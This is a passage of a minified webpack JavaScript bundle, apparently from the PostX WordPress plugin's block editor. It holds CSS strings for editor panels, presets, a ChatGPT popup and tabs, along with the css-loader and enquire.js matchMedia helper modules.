!important}.ultp-dynamic-content-textfield{display:flex;align-items:center;justify-content:space-between;margin-bottom:24px !important}.ultp-dynamic-content-textfield .components-base-control{margin-bottom:0px !important;flex-basis:190px}.ultp-dynamic-content-textfield .components-base-control__field{margin-bottom:0px !important}.ultp-dynamic-content-textfield label{font-size:11px;font-weight:500;line-height:1.4;text-transform:uppercase;box-sizing:border-box;display:block;padding-top:0px;padding-bottom:0px;max-width:100%;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.ultp-dyanmic-content-pro{padding:20px 15px 20px 15px;background-color:#fff3f4}.ultp-dyanmic-content-pro-link{width:fit-content;display:flex;gap:3px;align-items:center;color:#f0406a;font-size:13px;text-decoration:none;margin-top:8px;border-bottom:1px solid #f0406a}.ultp-dyanmic-content-pro-link svg{fill:#f0406a}.ultp-dyanmic-content-pro-link:hover{color:#f0406a}.ultp-dynamic-content-empty{text-align:center;font-size:14px;padding:10px 15px}.ultp-dc-icon-control .ultp-field-icons{display:flex;align-items:center;justify-content:space-between;width:auto}.ultp-dc-icon-control .ultp-field-wrap{padding-top:0px}.ultp-dc-icon-control .ultp-sub-field{margin-top:0px;width:auto;flex-basis:190px}.ultp-dc-icon-control .ultp-icon-input{width:-webkit-fill-available}",""]);const r=n},14437:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-toolbar-sort{display:flex;flex-direction:column;justify-content:center;gap:3px}.ultp-toolbar-sort-btn{cursor:pointer;display:flex;justify-content:center;align-items:center;height:18px;margin-left:-5px;transition:all 200ms ease-in-out}.ultp-toolbar-sort-btn svg{color:#000;width:24px;height:auto}.ultp-toolbar-sort-btn:hover{background-color:rgba(3,127,255,.7);border-radius:3px}.ultp-toolbar-sort-btn:hover svg{color:#fff}.ultp-toolbar-sort-horizontal{flex-direction:row !important;align-items:center}.ultp-toolbar-sort-horizontal .ultp-toolbar-sort-btn{rotate:-90deg}",""]);const r=n},97921:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-responsive-device{position:relative;margin-right:5px}.ultp-responsive-device:hover .ultp-device-dropdown{display:block}.ultp-responsive-device .ultp-selected-device{min-width:18px;height:18px;outline:1px solid #cbced7;border-radius:2px;padding:1px 3px 1px 3px;color:#272727}.ultp-responsive-device .ultp-device-dropdown{display:none;min-width:18px;position:absolute;top:100%;left:0;z-index:3;background:#fff;outline:1px solid #cbced7;border-radius:2px;cursor:pointer}.ultp-responsive-device .ultp-device-dropdown .ultp-device-dropdown-item{color:#272727}.ultp-responsive-device .ultp-device-dropdown .ultp-device-dropdown-item.active{background-color:#eef4fa;color:#037fff}.ultp-responsive-device .ultp-device-dropdown .ultp-device-dropdown-item svg{padding:2px 3px}.ultp-device{display:inline-block;position:relative;top:3px}",""]);const r=n},10912:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-field-unit-list{position:relative;margin-right:4px}.ultp-field-unit-list:hover .ultp-unit-dropdown{display:block}.ultp-field-unit-list .ultp-unit-checked{width:fit-content;height:18px;outline:1px solid #cbced7;border-radius:2px;padding:0px 3px;font-size:14px;line-height:14px;color:#000}.ultp-field-unit-list .ultp-unit-dropdown{display:none;width:fit-content;position:absolute;top:100%;left:0;z-index:3;background:#fff;outline:1px solid #cbced7;border-radius:2px;cursor:pointer}.ultp-field-unit-list .ultp-unit-dropdown .ultp-unit-dropdown-item{padding:0px 3px;color:#272727}.ultp-field-unit-list .ultp-unit-dropdown .ultp-unit-dropdown-item.active{background-color:#eef4fa;color:#037fff}",""]);const r=n},4:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-postx-settings-panel-title{display:flex;align-items:center;gap:15px}.ultp-postx-settings-panel-title span:first-child{display:flex;justify-content:center;align-items:center;cursor:pointer}.ultp-postx-settings-panel-title span:first-child svg{width:15px;height:100%}.ultp-postx-settings-panel-title span:first-child:hover{color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9))}.ultp-preset-save-wrapper{padding:10px;border-bottom:1px solid #ddd;text-align:center}.ultp-preset-save-wrapper .ultp-preset-save-btn{background:var(--postx-primary-color);border:none;padding:10px 20px;border-radius:4px;width:100%;color:#fff;opacity:.4;cursor:default;display:flex;justify-content:center;align-items:center;gap:5px;pointer-events:none}.ultp-preset-save-wrapper .ultp-preset-save-btn.active{opacity:1;cursor:pointer;pointer-events:inherit}.ultp-preset-save-wrapper .ultp-preset-save-btn.active:hover{background:var(--postx-primary-hover-color)}.ultp-preset-save-wrapper .ultp-preset-save-btn svg{animation:spins 1s linear infinite;height:12px;width:12px;fill:#fff;margin-top:2px}.ultp-preset-options-tab{padding:15px 16px;border-bottom:1px solid #e2e2e2}.ultp-preset-options-tab .ultp-color-field-tab{text-align:center}.ultp-preset-options-tab .ultp-color-field-tab .preset-choose{color:var(--postx-primary-color);cursor:pointer;display:flex;gap:6px;align-items:center;font-size:14px}.ultp-preset-options-tab .ultp-color-field-tab .preset-choose>div{margin-top:2px;margin-left:2px}.ultp-preset-options-tab .ultp-color-field-tab .preset-choose>div svg{height:10px;width:10px}.ultp-preset-options-tab .ultp-color-field-tab .preset-choose>div svg path{fill:var(--postx-primary-color)}.ultp-editor-dark-key-container{display:flex;align-items:center;gap:10px;margin:20px 0;font-size:14px}.ultp-editor-dark-key-container .light-label{margin-top:-14px;color:#000}.ultp-editor-dark-key-container .ultp-field-wrap.ultp-field-toggle{padding-top:0}.ultp-editor-dark-key-container .ultp-field-wrap.ultp-field-toggle .components-toggle-control__label{margin-left:10px;color:#868686}.ultp-editor-dark-key-container.dark-active .light-label{color:#868686}.ultp-editor-dark-key-container.dark-active .ultp-field-toggle .components-toggle-control__label{color:#000}.ultp-global-current-content{display:flex;justify-content:space-between;background:var(--postx_preset_Base_1_color);padding:10px 20px;border-radius:4px;border:solid 1px #e0e0e0;max-height:48px;cursor:pointer}.ultp-global-current-content.seleted .ultp-global-color{border:none;box-shadow:none}.ultp-global-current-content .ultp-preset-typo-show>span{font-size:22px}.ultp-global-current-content .ultp-preset-color-show{display:flex;gap:10px}.ultp-global-current-content .ultp-preset-color-show .ultp-global-color{height:20px;width:20px}.ultp-preset-color-tabs{padding:15px 16px}.ultp-preset-color-tabs .ultp-global-color-label-content{font-weight:500}.ultp-preset-color-tabs .ultp-global-color-label .ultp-color-field-tab>div{padding:3px 10px;font-size:12px}.ultp-editor-preset-typo-lists{display:flex;justify-content:space-between;align-items:center;gap:6px}.ultp-editor-preset-typo-lists.ultp-preset-color-label{margin-top:-10px;margin-bottom:15px}.ultp-editor-preset-typo-lists.ultp-preset-color-label .typo-label-container{padding:8px 10px;border:1px solid #e0e0e0;border-radius:4px}.ultp-editor-preset-typo-lists.ultp-preset-color-label .typo-label-container .color-delete{cursor:pointer;height:22px;width:22px;background:#d30b08;border-radius:2px;display:flex;align-items:center;justify-content:center}.ultp-editor-preset-typo-lists.ultp-preset-color-label .typo-label-container .color-delete svg{fill:#fff;height:18px;width:18px}.ultp-editor-preset-typo-lists .typo-label-container{width:100%;padding:10px;display:flex;gap:5px;justify-content:space-between;align-items:center}.ultp-editor-preset-typo-lists .typo-label-container .typo-label-demo{display:flex;gap:5px;justify-content:space-between;align-items:center}.ultp-editor-preset-typo-lists .typo-label-container .typo-label-demo .typo-demo{border-radius:2px;border:solid 1px #707070;padding:1px 5px;font-size:10px;color:#000}.ultp-editor-preset-typo-lists .typo-label-container .typo-label-demo .typo-label{font-size:12px;color:#000}.ultp-editor-preset-typo-lists .typo-label-container .typo-label-demo input.typo-label{font-size:10px;max-width:130px;background:#f8f8f8;border-radius:2px;border:solid 1px #efefef;padding:6px 2px}.ultp-editor-preset-typo-lists .ultp-editor-typo-actions{display:flex;align-items:center;gap:5px;padding:10px}.ultp-editor-preset-typo-lists .typo-delete,.ultp-editor-preset-typo-lists .typo-edit{visibility:hidden;height:22px;width:22px;background:#7d7d7d;border-radius:2px;display:flex;align-items:center;justify-content:center}.ultp-editor-preset-typo-lists .typo-delete svg,.ultp-editor-preset-typo-lists .typo-edit svg{fill:#eaeaea;height:18px;width:18px}.ultp-editor-preset-typo-lists:hover .typo-delete,.ultp-editor-preset-typo-lists:hover .typo-edit{visibility:visible}.ultp-editor-global-typo-container{padding-top:6px}.ultp-editor-background-setting-container{margin-top:20px}.ultp-editor-background-setting-container .ultp-editor-background-setting-label{font-size:12px;color:#000;margin-bottom:10px}.ultp-editor-background-setting-container .ultp-editor-background-setting-content{border:1px solid #e0e0e0;padding:10px;border-radius:2px}.ultp-editor-background-setting-container .ultp-editor-background-setting-content .ultp-editor-background-demo{height:50px;border:1px solid #e3e3e3;border-radius:2px}.ultp-editor-background-setting-container .ultp-editor-background-setting-content .ultp-color2-btn__group{border-color:#e3e3e3}.ultp-editor-background-setting-container .ultp-editor-background-setting-content .ultp-sub-field,.ultp-editor-background-setting-container .ultp-editor-background-setting-content .ultp-color2-btn__group{width:100%}",""]);const r=n},99243:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-chatgpt-popup .ultp-popup-wrap{max-width:790px;height:fit-content;margin:100px auto 0;background:#fff}@media only screen and (max-width: 800px){.ultp-chatgpt-popup .ultp-popup-wrap{height:80%}}.ultp-chatgpt-popup .ultp-popup-filter-title{min-height:52px;padding:0 20px !important}.ultp-chatgpt-popup .ultp-popup-filter-title span{text-transform:none}.ultp-chatgpt-popup .ultp-btn-close{height:52px;width:54px}.ultp-chatgpt-popup .ultp-popup-filter-image-head img{width:32px}.ultp-chatgpt-wrap{background-color:#fff;padding:40px 60px}.ultp-chatgpt-wrap .ultp-error-notice{margin-bottom:20px;padding:12px 16px;border-radius:6px;border:1px solid rgba(255,236,181,.5);background-color:rgba(255,243,205,.4);font-size:14px;color:#67531e}.ultp-chatgpt-wrap .ultp-chatgpt-search{display:flex;gap:10px}.ultp-chatgpt-wrap .ultp-chatgpt-search input{flex-basis:90%}.ultp-chatgpt-popup-content input{padding:5px 5px 5px 20px;border-radius:4px;border:solid 1px #e7e7e7;max-height:40px}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button{max-width:130px;display:inline-flex;align-items:center;padding:5px 8px 5px 8px;border-radius:4px;max-height:40px}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button,.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button:hover{border:solid 1px #10a37f !important;background:#10a37f !important;color:#fff !important}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button:focus{outline:none;box-shadow:none;border:solid 1px #10a37f !important}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button .dashicons{line-height:normal;margin-right:5px}.ultp-chatgpt-popup-content .ultp-ask-chatgpt-button .chatgpt-loader{margin-right:5px;margin-left:6px;border-color:#095d49;border-top-color:#fff}.ultp-chatgpt-popup-content textarea{width:100%;min-height:120px;border:1px solid #e7e7e7;border-radius:4px;padding:15px 20px}.ultp-chatgpt-popup-content .ultp-btn-items{display:flex;flex-wrap:wrap;gap:5px;margin:20px 0 30px}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item{border:1px solid #e7e7e7;padding:7px 12px;background:#fafafa;border-radius:4px;cursor:pointer;transition:400ms;font-size:14px;line-height:normal}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item:has(select){padding:0px}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item select{border:none;background-color:rgba(0,0,0,0);line-height:normal;min-height:auto;padding:7px 24px 7px 12px;font-size:14px}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item select:focus{border:none;outline:0}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item:hover{background:#f2f2f2}.ultp-chatgpt-popup-content .ultp-btn-items .ultp-btn-item .chatgpt-loader{top:3px;position:relative}.ultp-chatgpt-popup-content .ultp-btn-items:has(.chatgpt-loader) .ultp-btn-item:not(:has(.chatgpt-loader)){pointer-events:none;opacity:.5}.ultp-chatgpt-popup-content .ultp-center{display:flex;justify-content:center;gap:15px}.ultp-chatgpt-popup-content .ultp-center .ultp-btn .dashicons{vertical-align:middle}.ultp-chatgpt-input-container .ultp-chatgpt-api-warning{margin:auto auto;width:fit-content;color:#1e1e1e;margin-bottom:30px;font-size:20px;display:flex;align-items:center}.ultp-chatgpt-input-container .ultp-chatgpt-api-warning a{color:#037fff;text-decoration:underline;margin:0 2px}.ultp-chatgpt-input-container .ultp-chatgpt-api-warning svg{margin-right:10px}.ultp-chatgpt-nokey .ultp-btn-items,.ultp-chatgpt-nokey .ultp-center,.ultp-chatgpt-nokey .ultp-ask-chatgpt-button{opacity:.5;pointer-events:none}.chatgpt-loader{display:inline-block;border:3px solid var(--postx-primary-color);border-radius:50% !important;border-top:3px solid #fff;width:8px;height:8px;animation:spins 1s linear infinite;margin-right:8px}@keyframes spins{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}",""]);const r=n},84586:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-label-tag-pro{display:inline-block;padding:0 3px;font-weight:bold;border-radius:3px;font-size:10px;margin-left:5px;background-color:#037fff;color:#fff}.ultp-label-tag-pro a{color:#fff !important;text-decoration:none !important}.ultp-label-tag-new{display:inline-block;padding:0 3px;font-weight:bold;border-radius:3px;font-size:10px;margin-left:5px;background-color:#4caf50;color:#fff}.ultp-label-tag-dep{display:inline-block;padding:0 3px;font-weight:bold;border-radius:3px;font-size:10px;margin-left:5px;background-color:#ff5733;color:#fff}.ultp-editor-support{text-align:center;padding:22px 15px;border-top:1px solid #e0e0e0;background-color:#f9f9f9}.ultp-editor-support .ultp-editor-support-content{display:flex;flex-direction:column;align-items:center;gap:20px}.ultp-editor-support .ultp-editor-support-content .logo{height:40px;width:auto}.ultp-editor-support .ultp-editor-support-content .title{color:#000;font-size:20px;font-weight:bolder}.ultp-editor-support .ultp-editor-support-content .descp{color:#000;font-size:14px;text-align:center}.ultp-editor-support .ultp-editor-support-content a{padding:10px 25px;color:#fff;font-size:14px;font-weight:bold;line-height:1.4;background:linear-gradient(180deg, #399aff, transparent) #004fd0;border-radius:4px;text-decoration:none;display:inline-block;border:none;transition:background-color 400ms}.ultp-editor-support .ultp-editor-support-content a:hover{background-color:var(--postx-primary-color)}",""]);const r=n},26107:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,'.ultp-accordion-tab .components-tab-panel__tabs{padding:4px;align-items:center;justify-content:center;background:#e7ecf2;border:1px solid #d4d7e1;border-top:none;position:relative;border-bottom-left-radius:4px;border-bottom-right-radius:4px}.ultp-accordion-tab .components-tab-panel__tabs::after{content:"";position:absolute;width:8px;height:8px;bottom:-6px;background:#e7ecf2;transform:rotate(45deg);z-index:0;overflow:hidden;border:14px solid #e7ecf2;border-top:0px;border-left:0;box-shadow:1px 1px 0px 0px #d4d7e1}.ultp-accordion-tab .components-tab-panel__tabs-item{height:fit-content !important;padding:4px}.ultp-accordion-tab .components-tab-panel__tabs-item::after,.ultp-accordion-tab .components-tab-panel__tabs-item::before{display:none}.ultp-accordion-tab .components-tab-panel__tabs-item:hover{color:#41474e}.ultp-accordion-tab .components-tab-panel__tabs-item.is-active{background:#272727;border-radius:3px;color:#fff}.ultp-accordion-tab .components-tab-panel__tabs-item.is-active svg{fill:#fff}.ultp-accordion-tab button[role=tab]{min-width:auto;position:relative;z-index:999}.ultp-accordion-tab .ultp-tab-button{display:flex;align-items:center;gap:4px}.ultp-accordion-tab .ultp-tab-button svg{color:#000;fill:rgba(0,0,0,0);height:16px;width:16px}.ultp-accordion-tab .ultp-tab-button span{font-size:12px;line-height:14px}.ultp-accordion-tab .components-notice{margin-top:14px}.ultp-settings-tab-field .components-tab-panel__tabs{width:fit-content;margin:0 auto 12px}.ultp-settings-tab-field .components-tab-panel__tabs button{padding:4px 12px !important;font-weight:500}.ultp-tabs-field{padding-top:0;padding-bottom:0;background:#f4f6f9;border:1px solid #dfe5ea;border-radius:6px;margin-top:12px;margin-bottom:12px}.ultp-tabs-field .components-tab-panel__tabs{width:100%;padding:4px;border-radius:2px;background:#e7ecf2}.ultp-tabs-field .components-tab-panel__tabs>button{height:fit-content !important;border-radius:2px;background:rgba(0,0,0,0);border:0;font-size:12px !important;line-height:16px !important;padding:4px 12px;outline:0;cursor:pointer;display:inline-block;text-align:center;height:auto;color:#41474e;width:100%}.ultp-tabs-field .components-tab-panel__tabs>button::after,.ultp-tabs-field .components-tab-panel__tabs>button::before{display:none}.ultp-tabs-field .components-tab-panel__tabs>button.active-tab{font-weight:500 !important;background:#272727;border-radius:3px;color:#fff}.ultp-tabs-field .components-tab-panel__tabs>button.active-tab svg{fill:#fff}.ultp-tabs-field .components-tab-panel__tab-content{padding:4px 12px 0px}.ultp-tabs-field .components-tab-panel__tab-content .ultp-field-wrap{padding:8px 0px}.ultp-sort-items{margin:10px 0px}.ultp-sort-items .components-base-control{margin-bottom:unset}.short-field-wrapper{display:flex;align-items:center;border:1px solid #222;padding:0px}.short-field-wrapper__inside{display:flex;align-items:center;gap:10px}.short-field-wrapper__inside div{text-transform:capitalize}.short-field-wrapper__control{padding:0px 3px 0px 8px}.short-field-wrapper__control span{font-size:17px;color:#1c1c1c;display:flex;align-items:center}.short-field-wrapper__label{display:flex;align-items:center;justify-content:space-between;width:100%;cursor:pointer}.short-field-wrapper>.dashicons{cursor:pointer}.short-field-wrapper .short-field-label{display:flex;align-items:center;justify-content:space-between;width:100%;cursor:pointer}.ultp-sort-close{height:100%;font-size:17px;color:#1c1c1c;display:flex;align-items:center;justify-content:center;border-left:1px solid #000;box-sizing:content-box;padding:8px}.ultp-sort-close.dashicons-hidden{opacity:.4}.ultp-sort-btn{color:#454545;cursor:pointer;font-size:10px;font-weight:normal;display:flex;align-items:center;border-radius:2px;border:solid 1px #757575;background:none;margin:13px auto 0px;padding:8px 20px 8px 20px}.ultp-sort-btn span{font-size:14px;display:flex;align-items:center}.ultp-short-content{height:0px;display:none;opacity:0;transition:all .5s;box-sizing:border-box}.ultp-short-content.active{opacity:100;display:block;height:auto;opacity:1;border:1px solid #222;transition:all .5s;padding:0px 7px 17px;border-top:none}',""]);const r=n},87616:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-fs-comment-input__wrapper,.ultp-fs-comment-view__wrapper{width:270px;padding:17px 15px !important;outline:0 !important}.ultp-fs-comment-input__wrapper .ultp-fs-comment-resolve,.ultp-fs-comment-input__wrapper .ultp-fs-comment-btn,.ultp-fs-comment-view__wrapper .ultp-fs-comment-resolve,.ultp-fs-comment-view__wrapper .ultp-fs-comment-btn{color:#fff;font-size:12px;font-weight:500 !important;line-height:normal;text-align:center;display:block;border-radius:4px;background-image:linear-gradient(to bottom, #399aff, #016cdb);margin:15px 0 13px;padding:11px 21px 11px 21px !important;border:none}.ultp-fs-comment-input__wrapper .ultp-fs-comment-resolve:hover,.ultp-fs-comment-input__wrapper .ultp-fs-comment-btn:hover,.ultp-fs-comment-view__wrapper .ultp-fs-comment-resolve:hover,.ultp-fs-comment-view__wrapper .ultp-fs-comment-btn:hover{background-image:linear-gradient(to bottom, #016cdb, #399aff)}.ultp-fs-comment{border:1px dashed #c4c4c4;padding:11px 21px 11px 15px !important}.ultp-fs-has-comment{background-color:#ff0}.ultp-fs-has-suggestion{background-color:#daacff}",""]);const r=n},6500:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,'.ultp-section-tab{margin-top:16px}.ultp-section-tab .ultp-section-wrap.ultp-section-fixed{position:sticky;top:-3px;background:#fff;z-index:10000;box-shadow:0px 2px 2px 0px rgba(0,0,0,.12)}.ultp-section-tab .ultp-section-wrap .ultp-section-wrap-inner{display:flex;justify-content:space-between;background:#fff;position:relative}.ultp-section-tab .ultp-section-wrap .ultp-section-wrap-inner>.ultp-section-title:first-child{min-width:99px}.ultp-section-tab .ultp-section-wrap .ultp-section-title{text-align:center;position:relative;background:#f4f6f9;width:100%;cursor:pointer;box-sizing:border-box;border-top-left-radius:8px;border-top-right-radius:8px;height:48px}.ultp-section-tab .ultp-section-wrap .ultp-section-title::before{content:"";position:absolute;bottom:50%;left:0;right:0;top:0}.ultp-section-tab .ultp-section-wrap .ultp-section-title::after{content:"";position:absolute;bottom:0;top:50%;z-index:1}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active{border-bottom:none;background:#f4f6f9}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active::before{border:1px solid #d6d9dd;border-bottom:none;border-top-left-radius:8px;border-top-right-radius:8px}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active span{color:#070707;font-weight:500}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active .ultp-section-title-overlay{display:none}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active-prev::after{left:0px;right:-1%;border-bottom-right-radius:8px;border-bottom:1px solid #d6d9dd;border-right:1px solid #d6d9dd}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active-prev.active-prev-sm::after{right:-2px}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active-prev .ultp-section-title-overlay{border-bottom-right-radius:8px}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active-next::after{left:-1%;right:0px;border-bottom-left-radius:8px;border-bottom:1px solid #d6d9dd;border-left:1px solid #d6d9dd}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active-next.active-next-sm::after{left:-0.5px}.ultp-section-tab .ultp-section-wrap .ultp-section-title.active-next .ultp-section-title-overlay{border-bottom-left-radius:8px}.ultp-section-tab .ultp-section-wrap .ultp-section-title:not(.active):not(.active-prev):not(.active-next){border-bottom:1px solid #d6d9dd}.ultp-section-tab .ultp-section-wrap .ultp-section-title .ultp-section-title-text{font-size:12px;color:#4a4a4a;font-weight:500;display:flex;align-items:center;justify-content:center;position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);text-wrap-mode:nowrap}.ultp-section-tab .ultp-section-wrap .ultp-section-title .ultp-section-title-overlay{background:#fff;width:100%;position:absolute;top:0px;left:0px;height:100%;z-index:0}.ultp-section-tab .ultp-section-content{background-color:#f4f6f9;display:none}.ultp-section-tab .ultp-section-content.active{display:block}.ultp-section-tab .ultp-section-content .ultp-field-wrap{padding-inline:16px}.ultp-section-tab .ultp-section-content .ultp-section-accordion .ultp-field-wrap{padding-inline:0px}.ultp-section-tab .ultp-section-content.ultp-section-group-sorting{padding-top:12px}.ultp-section-tab .ultp-section-content.ultp-section-group-sorting>.ultp-field-wrap.ultp-field-tag{padding-bottom:24px !important}.ultp-section-tab .ultp-section-content .ultp-section-show{padding-top:12px}.ultp-section-tab.ultp-menu-side-settings .ultp-section-title{display:flex;align-items:center;gap:4px;justify-content:center}.ultp-section-tab .ultp-section-content .ultp-field-wrap.ultp-separator-padding{padding-inline:0px}.ultp-section-without-tab>.ultp-section-accordion-show>.ultp-section-show{background-color:#f4f6f9;padding-top:12px}.ultp-section-group-accordion-settings>.ultp-section-accordion-show .ultp-section-show,.ultp-search-filter-settings>.ultp-section-group-style .ultp-section-show,.ultp-search-filter-settings>.ultp-section-group-setting .ultp-section-show,.ultp-clear-filter-settings>.ultp-section-group-setting .ultp-section-show,.ultp-select-filter-settings>.ultp-section-group-setting .ultp-section-show{background-color:#f4f6f9}',""]);const r=n},30024:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-ready-design>div{display:flex;gap:8px;justify-content:space-between;padding:0px 16px}.ultp-ready-design>div .ultp-ready-design-btns{display:flex;width:100%;justify-content:center;align-items:center;gap:4px;padding:6px 8px;font-size:12px;border-radius:6px;border:none;white-space:nowrap;font-weight:500;cursor:pointer;text-decoration:none;max-height:28px;transition:.3s}.ultp-ready-design>div .ultp-ready-design-btns svg{height:16px;width:16px}.ultp-ready-design>div .ultp-ready-design-btns.patterns{color:#fff;background:#1f66ff}.ultp-ready-design>div .ultp-ready-design-btns.patterns:hover{opacity:1;background:#224efe}.ultp-ready-design>div .ultp-ready-design-btns.preview{background:#e7ecf2;color:#41474e;max-width:94px;border:1px solid #e7ecf2}.ultp-ready-design>div .ultp-ready-design-btns.preview:hover{opacity:1;border-color:#1f66ff;color:#1f66ff}",""]);const r=n},71729:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-design-search-wrapper{margin-bottom:20px;width:fit-content;margin-left:auto;margin-right:auto}@media only screen and (max-width: 1250px){.ultp-design-search-wrapper{display:none}}.ultp-design-search-wrapper .ultp-design-search-input{color:#575a5d;padding:8px 15px;min-width:250px;height:36px;font-size:14px;border-radius:2px;border:solid 1px #eaedf2;background-color:#fff}.ultp-design-search-wrapper .ultp-design-search-input:focus{border:1px solid var(--postx-primary-color);box-shadow:unset}@media only screen and (max-width: 1350px){.ultp-design-search-wrapper .ultp-design-search-input{min-width:220px}}",""]);const r=n},4432:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(8081),a=l.n(o),i=l(23645),n=l.n(i)()(a());n.push([e.id,".ultp-layout-toolbar .ultp-field-wrap{padding-top:0px !important}.ultp-layout-toolbar .components-popover__content{width:270px;padding:7px 15px !important;border:1px solid #1e1e1e;outline:0px !important}.ultp-layout-toolbar .components-popover__content>.wopb-field-wrap{padding-top:0px !important}.ultp-layout-toolbar .ultp-field-layout-wrapper{grid-template-columns:repeat(3, 1fr) !important}.ultp-query-toolbar .components-popover__content{width:270px;padding:15px;border:1px solid #1e1e1e;outline:0px !important}.ultp-query-toolbar .components-popover__content .ultp-field-wrap:first-child{padding-top:0px !important}.ultp-query-toolbar .ultp-query-toolbar__btn{max-width:fit-content}.ultp-query-toolbar .ultp-query-toolbar__btn svg{max-height:22px;max-width:100%}",""]);const r=n},23645:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function(){return this.map((function(t){var l="",o=void 0!==t[5];return t[4]&&(l+="@supports (".concat(t[4],") {")),t[2]&&(l+="@media ".concat(t[2]," {")),o&&(l+="@layer".concat(t[5].length>0?" ".concat(t[5]):""," {")),l+=e(t),o&&(l+="}"),t[2]&&(l+="}"),t[4]&&(l+="}"),l})).join("")},t.i=function(e,l,o,a,i){"string"==typeof e&&(e=[[null,e,void 0]]);var n={};if(o)for(var r=0;r<this.length;r++){var s=this[r][0];null!=s&&(n[s]=!0)}for(var p=0;p<e.length;p++){var c=[].concat(e[p]);o&&n[c[0]]||(void 0!==i&&(void 0===c[5]||(c[1]="@layer".concat(c[5].length>0?" ".concat(c[5]):""," {").concat(c[1],"}")),c[5]=i),l&&(c[2]?(c[1]="@media ".concat(c[2]," {").concat(c[1],"}"),c[2]=l):c[2]=l),a&&(c[4]?(c[1]="@supports (".concat(c[4],") {").concat(c[1],"}"),c[4]=a):c[4]="".concat(a)),t.push(c))}},t}},8081:e=>{"use strict";e.exports=function(e){return e[1]}},62988:(e,t,l)=>{var o=l(61755),a=l(26665).each;function i(e,t){this.query=e,this.isUnconditional=t,this.handlers=[],this.mql=window.matchMedia(e);var l=this;this.listener=function(e){l.mql=e.currentTarget||e,l.assess()},this.mql.addListener(this.listener)}i.prototype={constuctor:i,addHandler:function(e){var t=new o(e);this.handlers.push(t),this.matches()&&t.on()},removeHandler:function(e){var t=this.handlers;a(t,(function(l,o){if(l.equals(e))return l.destroy(),!t.splice(o,1)}))},matches:function(){return this.mql.matches||this.isUnconditional},clear:function(){a(this.handlers,(function(e){e.destroy()})),this.mql.removeListener(this.listener),this.handlers.length=0},assess:function(){var e=this.matches()?"on":"off";a(this.handlers,(function(t){t[e]()}))}},e.exports=i},38177:(e,t,l)=>{var o=l(62988),a=l(26665),i=a.each,n=a.isFunction,r=a.isArray;function s(){if(!window.matchMedia)throw new Error("matchMedia not present, legacy browsers require a polyfill");this.queries={},this.browserIsIncapable=!window.matchMedia("only all").matches}s.prototype={constructor:s,register:function(e,t,l){var a=this.queries,s=l&&this.browserIsIncapable;return a[e]||(a[e]=new o(e,s)),n(t)&&(t={match:t}),r(t)||(t=[t]),i(t,(function(t){n(t)&&(t={match:t}),a[e].addHandler(t)})),this},unregister:function(e,t){var l=this.queries[e];return l&&(t?l.removeHandler(t):(l.clear(),delete this.queries[e])),this}},e.exports=s},61755:e=>{function t(e){this.options=e,!e.deferSetup&&this.setup()}t.prototype={constructor:t,setup:function(){this.options.setup&&this.options.setup(),this.initialised=!0},on:function(){!this.initialised&&this.setup(),this.options.match&&this.options.match()},off:function(){this.options.unmatch&&this.options.unmatch()},destroy:function(){this.options.destroy?this.options.destroy():this.off()},equals:function(e){return this.options===e||this.options.match===e}},e.exports=t},26665:e=>{e.exports={isFunction:function(e){return"function"==typeof e},isArray:function(e){return"[object Array]"===Object.prototype.toString.apply(e)},each:function(e,t){for(var l=0,o=e.length;l<o&&!1!==t(e[l],l);l++);}}},24974:(e,t,l)=>{var o=l(38177);e.exports=new o},80973:(e,t,l)=>{var o=l(71169),a=function(e){var t="",l=Object.keys(e);return l.forEach((function(a,i){var 